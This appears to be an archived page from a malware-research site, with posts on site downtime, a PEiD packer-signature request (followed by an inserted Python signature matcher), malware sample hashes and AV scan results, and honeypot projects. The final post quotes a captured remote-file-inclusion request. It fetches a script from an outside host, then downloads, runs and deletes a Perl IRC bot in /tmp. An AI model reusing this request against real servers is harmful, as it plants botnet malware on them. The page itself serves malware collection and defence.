WARNING: This site contains samples of live malware. Use at your own risk.

Announcing Metasploit Framework 3 Alpha Release 3


Hop on over to the following link and grab your copy. Feedback is greatly appreciated:

http://metasploit.com/projects/Framework/msf3/

Downtime, maintenance and assorted emergencies


So you might have noticed that OffensiveComputing was acting strangely, had a broken database, or was generally down during the last 24 hours. Basically several things happened.

We use a vhost and it ran out of space (thanks for all the malware contributions!). A symptom of this is a database error. So I took steps to purchase more space which got increased by our provider sometime during the night. When I booted up my brain this morning I saw that both apache and the database daemons were not running for some reason and so I started them both and we are back up.

This illustrates a couple of issues. Primarily that I am not a web person/sysadmin and I have no interest in being one. (I got over that when geocities was still cool :)

packer request


Does anyone out there have a userdb of packer signatures? (think PEiD) We have a working packer detector now that runs on anything thanks to the pelp project guys, but it's a little sparse on signatures. I'll be adding my own sigs, but I thought I'd ask and see if anyone out there has any they are willing to donate. Sigs look like:

[Name of the Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true

Thanks!

V.
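As an added example (not code from the post, and not the pelp project's detector), here is a minimal parser and matcher for userdb entries in the format shown above: the packer names are hypothetical, the first pattern is the one quoted in the post, and a constructed byte buffer stands in for a PE image so it runs offline.

```python
# Constructed PEiD-style userdb in the post's format (hypothetical names; first pattern from the post).
USERDB = """
[Example Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true

[Example Anywhere Stub v2]
signature = 60 BE ?? ?? ?? ?? 8D BE
ep_only = false
"""
def parse_userdb(text):
    """Return [(name, pattern, ep_only)]; pattern bytes are ints, '??' wildcards are None."""
    sigs, name, fields = [], None, {}
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith(";"):  # skip blank lines and ';' comments
            continue
        if line.startswith("[") and line.endswith("]"):  # new [section]
            if name:
                sigs.append(_build(name, fields))
            name, fields = line[1:-1], {}
        elif "=" in line and name:
            key, val = (s.strip() for s in line.split("=", 1))
            fields[key.lower()] = val
    if name:
        sigs.append(_build(name, fields))
    return sigs

def _build(name, fields):
    pattern = [None if t == "??" else int(t, 16) for t in fields["signature"].split()]
    return name, pattern, fields.get("ep_only", "true").lower() == "true"

def match_at(data, offset, pattern):
    """True if pattern matches data at offset; a None wildcard accepts any byte."""
    return offset + len(pattern) <= len(data) and all(
        p is None or p == data[offset + i] for i, p in enumerate(pattern))

def scan(data, ep_offset, sigs):
    """Names of matching sigs: ep_only ones are tried at the entry point only, others anywhere."""
    hits = []
    for name, pattern, ep_only in sigs:
        offsets = [ep_offset] if ep_only else range(len(data))
        if any(match_at(data, off, pattern) for off in offsets):
            hits.append(name)
    return hits

def sample_image():
    """Constructed stand-in for a PE image: padding, the entry-point stub, then the second stub."""
    ep_stub = bytes.fromhex("50E8112233445825AAF0FFFF8BC883C1605183C04083EA0652FF209DC3")
    other = bytes.fromhex("60BE010203048DBE")
    return b"\x90" * 8 + ep_stub + b"\x00" * 4 + other, 8  # (data, entry-point offset)
```

Note that an ep_only signature is deliberately not reported when the same bytes occur away from the entry point, which is what keeps this kind of matching from flagging every file that happens to embed a packer stub somewhere.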

sdbots from soinull


Thanks to soinull for the big contribution.
Password is infected

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 6fc1e9e7942ba69aa7d4e252919a108e
SHA1SUM: 48e3941bdeff80273e474a2a6f0d033d73b4adf5
SHA256SUM: f000dde6db5d6188ba422b51c7908c9fc5fdad74cb1f3a6a24d75711e04595ae
A/V SCAN: Found Win32/Rbot
PACKER: PE_PATCH.PECOMPACT, PECBUNDLE, PECOMPACT
#################################

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 3780075cda61d6fc9487e412dc20d6bf
SHA1SUM: d0c5757874c24c22a272815c0e25e9d20434316f

Worm.Rays.A


Thanks to Scarlet Pimpernell for the sample.

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 2a53b32f891e1ec1bf71a3f3746d4bbb
SHA1SUM: 846e2bcdc0a2e2911056b57948f533d1096a003f
SHA256SUM: e7f0f9351093d504f7a65f1980f4312e79e256275d02037d4106e10394e13fcb
A/V SCAN: Worm.Rays.A
#################################

big signature list

the_scourge was kind enough to send us a big giant list of malware signatures. We will be importing it as soon as we can. This means we will have a bunch of signatures for which there is no malware sample. Therefore, if you happen to be searching for a signature and you find a post but no sample, and you have one, please be generous and attach it to the signature post.

Thanks!

V.

sdbot variant

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: d01799283d811fe24132a2914ac33f11
SHA1SUM: 916083e5d08ad213e321e6ad9bce774397732d08
SHA256SUM: 98b8843b596f29ccb8f45a7eb195056087da337fe927038e6021003d96bdd4f1
A/V SCAN: Clamav finds nothing
#################################

AntiVir Found nothing
ArcaVir Found Trojan.Rbot.Gen.224256.MX
Avast Found Win32:Rbot-AUY
AVG Antivirus Found IRC/BackDoor.SdBot.YDF
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing

Trojan.Win32.Agent.Q


EDITED by Tebodell

2C2EE583.DLL
MD5SUM: 476d8b31bfd01f2d264f2133c47a3d37
SHA1SUM: ba5ff9dfbd0702e85799ed46dd3197691b4eb149
SHA256SUM: 1dc6daa68dc554d95db5d9506f7ccb4eb85750c93f90f3b1762d74a096257ae0

PACKER: UPX
REF: Submitted by MythX
DATE FOUND: 2/20/2006
VECTOR: Email
THREAT: Backdoor
CME #: N/A

Nepenthes & MWCollect Join Forces


Great news for malware collectors! Stop by the sites for details.

http://www.mwcollect.org
http://nepenthes.sourceforge.net

Or click the handy links to the left of this.

Shellbot reloaded


Found this probing the networks just now... more soon.

UPDATE: Mmm Google hunting..

GET phpfile.php?action=logout&siteurl=http://www.carteirovirtual.org/cmd.txt?&cmd=cd%20/tmp;\
GET%20http://www.athgroup.org/bot3.txt;perl%20bot3.txt;rm%20-rf%20bot3.txt? HTTP/1.0